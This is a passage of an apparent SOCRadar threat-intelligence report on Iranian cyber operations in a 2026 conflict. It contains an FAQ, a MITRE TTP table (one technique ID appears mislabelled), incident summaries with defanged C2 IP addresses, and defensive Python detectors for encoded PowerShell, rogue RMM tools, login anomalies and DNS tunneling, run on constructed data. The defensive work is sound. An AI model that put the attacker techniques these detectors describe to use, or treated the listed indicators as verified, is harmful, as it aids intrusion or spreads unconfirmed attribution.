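     "command_line": "ScreenConnect.ClientService.exe"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The scheduled backup script on `ws01` and the properly installed ScreenConnect service on `srv01` score zero; the Word-spawned hidden encoded PowerShell on `ws02` and the RMM agent running out of a user's temp directory on `ws03` both alert. Weighting rather than single-indicator matching keeps `-NoProfile` or an approved RMM binary from paging anyone on its own.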

For Energy, Finance & Maritime Operators Specifically

  • Prioritize patching of DNS and network infrastructure against OilRig TTPs
  • Review DDoS mitigation capacity; Iran conducted sustained attacks against more than 50 US banks in a previous escalation cycle
  • Treat port systems, logistics platforms, and navigation communications as active targets

Other Organizations: NGOs, Diplomatic Missions, Media & Civil Society

Geography is now a risk factor. Any organization, regardless of sector or mission, with offices, staff, or digital infrastructure based in Israel, the United States, Gulf states, Jordan, or any country perceived as aligned with Operation Epic Fury should treat itself as potentially in scope. NGOs, diplomatic missions, media outlets, law firms, universities, healthcare providers, and private sector companies alike are all viable targets, either as primary objectives or as stepping stones to higher-value networks.

Beyond geography, Iranian APTs deliberately target civil society, journalists, diplomats, and activists as intelligence sources and to identify individuals deemed threats to the regime. If your organization works on, reports on, or engages with Iran-related policy, human rights, or regional affairs, the targeting risk is elevated regardless of where you are based.

For All Staff

  • Issue immediate awareness briefings; credential harvesting via social engineering is the primary threat vector, not malware
  • Treat any inbound outreach from journalists, conference organizers, or researchers as potentially adversarial until independently verified
  • Never enter credentials via links received by email, WhatsApp, or Telegram regardless of how legitimate the sender appears
  • Assume that any staff member who has engaged with Iran-related policy networks, attended regional conferences, or communicated with Iranian contacts may already be targeted

Cloud & Communications Security

  • Conduct immediate credential audits across all staff accounts on Microsoft 365, Google Workspace, and cloud collaboration platforms
  • Revoke and reissue all active session tokens
  • Review who has access to shared drives and document repositories; APT42 operates almost entirely within cloud environments post-compromise
  • Enable login anomaly alerting across all cloud platforms
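An added example, not SOCRadar's code, of the login anomaly alerting the last bullet asks for. It runs three checks over sign-in records reduced to the fields that matter: impossible travel between a user's consecutive successful sign-ins, a country absent from the user's baseline, and a successful sign-in over a legacy protocol that cannot enforce MFA. The event schema, the speed and distance thresholds, the baseline, and the sample records are constructed assumptions; the coordinates are the ones a geo-IP enrichment step would normally attach.

```python
"""Login anomaly alerting over cloud sign-in records (added example)."""
import math
from datetime import datetime

MAX_SPEED_KMH = 900.0    # assumption: faster than any airliner, so unattainable
MIN_DISTANCE_KM = 50.0   # assumption: ignore geo-IP jitter within one metro area
EARTH_RADIUS_KM = 6371.0
LEGACY_PROTOCOLS = {"imap", "pop3", "smtp", "authenticated smtp", "exchange activesync"}

# Constructed sample sign-in records (not real telemetry).
SAMPLE_SIGNINS = [
    {"user": "alice", "ts": "2026-03-10T08:00:00+00:00", "lat": 51.5074, "lon": -0.1278,
     "country": "GB", "protocol": "browser", "success": True},
    {"user": "alice", "ts": "2026-03-10T09:30:00+00:00", "lat": 35.6892, "lon": 51.3890,
     "country": "IR", "protocol": "browser", "success": True},
    {"user": "bob", "ts": "2026-03-10T10:00:00+00:00", "lat": 50.1109, "lon": 8.6821,
     "country": "DE", "protocol": "imap", "success": True},
    {"user": "carol", "ts": "2026-03-10T07:00:00+00:00", "lat": 40.7128, "lon": -74.0060,
     "country": "US", "protocol": "browser", "success": True},
    {"user": "carol", "ts": "2026-03-10T13:30:00+00:00", "lat": 38.9072, "lon": -77.0369,
     "country": "US", "protocol": "browser", "success": True},
    {"user": "carol", "ts": "2026-03-10T13:40:00+00:00", "lat": 55.7558, "lon": 37.6173,
     "country": "RU", "protocol": "browser", "success": False},
]
# Assumed 30-day baseline of countries each user normally signs in from.
BASELINE_COUNTRIES = {"alice": {"GB", "US"}, "bob": {"DE"}, "carol": {"US"}}


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two WGS84 points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def detect_signin_anomalies(signins, baseline):
    """Return a list of alert dicts with user, rule and supporting detail."""
    alerts = []
    last_success = {}  # user -> most recent successful sign-in seen so far
    for ev in sorted(signins, key=lambda e: (e["user"], e["ts"])):
        user = ev["user"]
        # Legacy protocols bypass MFA, so a success there is a finding on its own.
        if ev["success"] and ev["protocol"].lower() in LEGACY_PROTOCOLS:
            alerts.append({"user": user, "rule": "legacy_protocol_success",
                           "detail": f'{ev["protocol"]} from {ev["country"]}'})
        if not ev["success"]:
            continue  # failures belong to spray/brute-force rules, not travel math
        # First-seen country relative to the user's baseline.
        if ev["country"] not in baseline.get(user, set()):
            alerts.append({"user": user, "rule": "new_country", "detail": ev["country"]})
        # Impossible travel between this and the previous successful sign-in.
        prev = last_success.get(user)
        if prev is not None:
            hours = (_ts(ev) - _ts(prev)).total_seconds() / 3600.0
            dist = haversine_km(prev["lat"], prev["lon"], ev["lat"], ev["lon"])
            if dist >= MIN_DISTANCE_KM:
                speed = dist / hours if hours > 0 else math.inf  # same-second hops are impossible too
                if speed > MAX_SPEED_KMH:
                    alerts.append({"user": user, "rule": "impossible_travel",
                                   "detail": f'{prev["country"]} -> {ev["country"]}',
                                   "distance_km": round(dist), "speed_kmh": round(speed)})
        last_success[user] = ev
    return alerts


if __name__ == "__main__":
    for alert in detect_signin_anomalies(SAMPLE_SIGNINS, BASELINE_COUNTRIES):
        print(alert)
```

On the sample, `alice` triggers both impossible travel (London to Tehran in 90 minutes) and a new country, `bob` triggers the legacy-protocol rule, and `carol`'s New York to Washington sign-ins pass; her failed attempt from Moscow is deliberately not counted as travel. When one of these fires, the session tokens minted before the anomalous sign-in are the ones to revoke, which is why token revocation and anomaly alerting belong in the same runbook.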

For Diplomatic Missions & Embassies Specifically

  • Apply the above with maximum urgency; APT42 specifically impersonates credible diplomatic and policy personas to target foreign ministry staff
  • Treat all unsolicited conference invitations, document review requests, and interview requests as potential spearphishing attempts
  • Coordinate with national cyber authorities and threat intelligence firms for threat briefings and IoC sharing

Frequently Asked Questions

Which countries are most at risk of Iranian cyberattacks right now?

Organizations in Israel, the United States, and allied nations are likely to face direct or indirect targeting, with regional partners including Jordan, the UAE, Egypt, and Saudi Arabia also in scope. Gulf states hosting US military bases (Bahrain, Kuwait, and Qatar) face an elevated risk given they are already physical targets. Any country perceived as complicit in or supportive of Operation Epic Fury should treat itself as a potential cyber target.

Are NGOs and civil society organizations at risk?

Yes, and they are a priority target for Iranian APTs even outside of active conflict. APT42 specifically targets Western and Middle Eastern NGOs, media organizations, academic institutions, and activists. As recently as January 2026, the Iran-linked RedKitten campaign targeted human rights NGOs and activists using macro-laced documents disguised as records of protesters killed during the January crackdown, with malware using GitHub, Google Drive, and Telegram for command-and-control.

Which industries are most likely to be targeted?

Government, critical infrastructure, defense, financial services, academic, and media sectors face the highest direct targeting risk. Beyond these, energy, healthcare, and shipping are historically prioritized, with Iran demonstrating willingness to hit ICS and OT systems in water treatment, oil and gas, and port infrastructure.

What types of attacks should organizations expect?

Organizations should prepare for a mix of DDoS campaigns, ransomware, hack-and-leak operations, website defacements, and attacks targeting exposed edge devices with default passwords. Higher-value targets face spearphishing, credential harvesting via cloud environments, and potential destructive wiper deployments. Iran will also amplify the psychological impact of whatever it achieves: Tehran has a documented pattern of overstating the scope of successful intrusions, turning a single compromised machine into a claimed facility-wide breach as part of its information operations strategy.

Is the threat limited to the Middle East?

No. In past conflicts, Iran has conducted DDoS attacks against more than 50 US banks, ransomware campaigns against critical infrastructure, and disinformation operations aimed at creating political and social chaos within the United States. With CISA operating at reduced staffing due to a DHS funding lapse, the defensive posture of US civilian infrastructure is weaker than it should be at precisely the wrong moment.

Are there any pro-Israel or pro-US groups active?

Yes, but the imbalance is structural rather than a capability gap. Past escalations saw dozens of pro-Iranian groups versus only a handful of pro-Israeli ones — the current cycle is no different.

Allied-side actors include Predatory Sparrow (Israeli intelligence-linked, previously struck Iranian steel and fuel infrastructure), Indian Cyber Force (explicitly pro-Israel, active since 2022), and Syrian opposition-aligned groups like Anonymous Syria Hackers — whose recent breach claim against an Iranian tech firm signals a broader reorientation of former Iranian proxies following Damascus’s change of government.

The reason the allied side looks quieter is simple: Israel operates at the state level, making independent hacktivists largely redundant. Allied-side actors also don’t generate CISA advisories or vendor reports aimed at Western defenders — so they’re under-documented, not inactive. The Telegram asymmetry reflects who needs Telegram, not who is actually operating.

Why are fewer hacktivist groups active compared to the previous 12-day war period?

The lower activity appears linked to Iran's recent internet restrictions, which disrupted Telegram-based coordination and slowed proxy mobilization. At the same time, some Russian-aligned groups have divided their focus between Europe and the Middle East instead of concentrating on one theater. Most visible operations now come from pro-Iranian actors outside Iran, particularly in Southeast Asia, Pakistan, and the broader Middle East. This suggests a temporary coordination slowdown rather than a structural decline in long-term state-level cyber capability.

How does Iran use cyber warfare as a strategic tool?

Iran runs its cyber operations primarily through groups linked to the IRGC and the Ministry of Intelligence, making these attacks state-directed rather than opportunistic. These groups focus on long-term espionage, harvesting credentials, and embedding backdoors inside target networks well before any conflict begins. When tensions escalate, the same access gets used for disruption, including wiper malware designed to destroy data and cripple systems. This combination of persistent espionage and ready-to-activate disruption capability is what makes Iranian cyber operations a serious threat, not just during conflict, but at all times.

What cyber attacks has Iran launched against Israel?

Since Operation Epic Fury began, the cyber response against Israel has been led largely by pro-Iranian hacktivist groups rather than confirmed direct Iranian state operations, though given that IRGC-linked networks span across the Middle East, many of these groups are considered state-adjacent at minimum.

Groups like Handala, 313 Team, and Keymous have run DDoS campaigns, data leak operations, and defacements targeting Israeli government, defense, and commercial infrastructure from day one. On the more confirmed state side, MuddyWater stands out: the IRGC-linked group had already pre-planted backdoors inside Israeli-adjacent defense and financial targets before the conflict even started, meaning the access was ready to use the moment tensions escalated.

Conclusion

The conflict that began on February 28, 2026, has no clear endpoint, and the cyber campaign will outlast the kinetic one. Iranian APT groups do not stand down when missiles stop flying. They retool and return. Hacktivist collectives are already mobilizing. Credential harvesting campaigns are running in parallel with every news cycle.

The organizations compromised in the weeks ahead will largely be those that waited to act. The threat is structured, state-directed, and already in motion.

Stay Ahead with SOCRadar

SOCRadar Dark Web Monitoring is actively monitoring all threat actor activity surrounding this conflict in real time across Dark Web forums, Telegram channels, and APT infrastructure. During this period of heightened risk, SOCRadar is offering free access to its threat intelligence platform for organizations in targeted countries and sectors.

With SOCRadar you can:

  • Track IoCs tied to APTs like MuddyWater, APT42, OilRig, and active hacktivist collectives
  • Monitor your attack surface and identify exposed assets before threat actors do
  • Receive real-time Dark Web alerts for credential leaks and breach claims tied to your organization


Appendix

A. Iranian APT TTP Matrix

| MITRE Tactic | Technique | Primary Actors |
|---|---|---|
| Initial Access | Spear-phishing (T1566) | APT33, APT35/42, MuddyWater, Tortoiseshell |
| Initial Access | Exploit Public-Facing Applications (T1190) | Fox Kitten, MuddyWater |
| Credential Access | Cloud Credential Harvesting (T1056) | APT35/APT42 |
| Credential Access | DNS Hijacking (T1584.002) | APT34/OilRig |
| Persistence | Abuse of Legitimate RMM Tools (T1219) | MuddyWater, APT42 |
| Persistence | DLL Side-Loading via PowGoop (T1574.002) | MuddyWater |
| Defense Evasion | LOLBins: PowerShell, CMSTP, WMI (T1218) | MuddyWater, APT34 |
| C2 | DNS Tunneling (T1071.004) | APT34/OilRig |
| C2 | Legitimate Web Services: GitHub, GDrive, Telegram (T1102) | APT42, MuddyWater |
| Exfiltration | Cloud Storage Exfiltration (T1567) | APT42 |
| Impact | Disk Wipe / Data Destruction (T1485) | APT33, APT34 |
| Impact | OT/ICS Device Manipulation (T0831) | CyberAv3ngers |

B. Recent Incidents

Handala Stryker Wiper Attack (March 11, 2026) — MOIS-linked Handala orchestrated a destructive attack against US medtech giant Stryker, abusing Microsoft Intune administrative access to remotely wipe approximately 80,000 devices across multiple countries after compromising privileged Entra ID accounts. Stryker confirmed the incident via SEC 8-K, acknowledging global disruption to its Microsoft environment affecting order processing, manufacturing, and shipping. The actor claimed 200,000+ devices wiped and 50TB exfiltrated; neither figure has been independently verified.

Check Point published campaign-level IOCs, including C2 infrastructure at 82.25.35[.]25, 31.57.35[.]223, 107.189.19[.]52, and 146.185.219[.]235. SYK stock fell more than 7.6% over three consecutive trading sessions. Investigation ongoing as of March 17, 2026.

RedKitten (January 2026) — APT42-linked campaign targeting human rights NGOs with macro-laced Office documents disguised as protest casualty records. C2 via GitHub, Google Drive, and Telegram bots.

DCHSpy / MuddyWater (July 2025) — New Android and desktop implant deployed during the June 2025 conflict, confirming active development concurrent with kinetic operations.

CyberAv3ngers / IOControl (2024–ongoing) — IRGC-affiliated malware targeting OT and IoT infrastructure across US and Israeli water utilities and fuel management systems. CISA advisory issued; US Rewards for Justice offer of up to $10M for attribution information remains active.

Anon-g Fox Wiper (June 2025) — Wiper configured to execute only on systems running Israel Standard Time and Hebrew as the default language, confirming geographically targeted destructive deployment.

C. Behavioral Indicators

| Type | Pattern | Actor |
|---|---|---|
| Network | High-entropy subdomains in DNS queries | APT34/OilRig |
| Network | Outbound to GitHub/Google Drive from non-dev endpoints | APT42, MuddyWater |
| Host | GoogleUpdate.exe loading unsigned DLLs from non-standard paths | MuddyWater |
| Host | Unauthorized RMM tool installation (Atera, ScreenConnect) | MuddyWater |
| Cloud | Bulk email forwarding rules on executive accounts | APT35/APT42 |
| Cloud | New OAuth grants to unrecognized third-party apps | APT42 |
| OT/ICS | Internet-exposed PLCs with default vendor credentials | CyberAv3ngers |
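The first network indicator above (high-entropy subdomains, the footprint of the DNS tunneling TTP attributed to APT34/OilRig in Appendix A) can be turned into a simple detection. The following is an added example, not SOCRadar's or any vendor's detection code: it runs over a constructed DNS query log, scores the leftmost label of each query by Shannon entropy, and flags a client that churns through several distinct encoded-looking subdomains under one parent domain. The log format, thresholds, the `.test` placeholder domain and the "last two labels" approximation of the parent domain are all assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed sample DNS query log (not real telemetry). One query per line:
# "<timestamp> <client_ip> <query_name> <query_type>"
SAMPLE_DNS_LOG = """\
2026-03-10T08:01:02Z 10.0.4.21 www.example.com A
2026-03-10T08:01:03Z 10.0.4.21 mail.example.com A
2026-03-10T08:01:09Z 10.0.4.37 4a7f9e2c1b0d3e5f6a8b.c2-placeholder.test TXT
2026-03-10T08:01:10Z 10.0.4.37 9f3e1a6b7c8d2e4f5a0b.c2-placeholder.test TXT
2026-03-10T08:01:11Z 10.0.4.37 b1c2d3e4f5a6978877aa.c2-placeholder.test TXT
2026-03-10T08:01:12Z 10.0.4.37 7e6d5c4b3a2918f0e1d2.c2-placeholder.test TXT
2026-03-10T08:02:00Z 10.0.4.21 static-assets.cdn.example.com A
"""

ENTROPY_THRESHOLD = 3.5  # bits/char; hex or base32 payload labels sit above this
MIN_LABEL_LEN = 12       # short labels can look random by chance
MIN_UNIQUE_LABELS = 3    # a tunnel churns through many distinct subdomains

def shannon_entropy(s: str) -> float:
    """Shannon entropy of s in bits per character (0.0 for the empty string)."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def is_suspicious_label(label: str) -> bool:
    """True if one DNS label looks like encoded data rather than a hostname."""
    return len(label) >= MIN_LABEL_LEN and shannon_entropy(label) >= ENTROPY_THRESHOLD

def find_dns_tunnel_candidates(log_text: str) -> dict:
    """Count distinct encoded-looking leftmost labels per (client, parent domain)
    and return the pairs at or above MIN_UNIQUE_LABELS. The parent domain is
    approximated as the last two labels (assumption: no public-suffix list)."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed line
        client, qname = parts[1], parts[2].rstrip(".").lower()
        labels = qname.split(".")
        if len(labels) < 3:
            continue  # no subdomain available to carry data
        if is_suspicious_label(labels[0]):
            parent = ".".join(labels[-2:])
            seen[(client, parent)].add(labels[0])
    return {k: len(v) for k, v in seen.items() if len(v) >= MIN_UNIQUE_LABELS}

if __name__ == "__main__":
    for (client, parent), n in find_dns_tunnel_candidates(SAMPLE_DNS_LOG).items():
        print(f"{client} -> {parent}: {n} distinct high-entropy subdomains")
```

Legitimate CDN and SaaS hostnames with long but low-entropy labels (such as `static-assets` above) stay below the threshold; tune `MIN_UNIQUE_LABELS` against your own resolver volume before alerting on it.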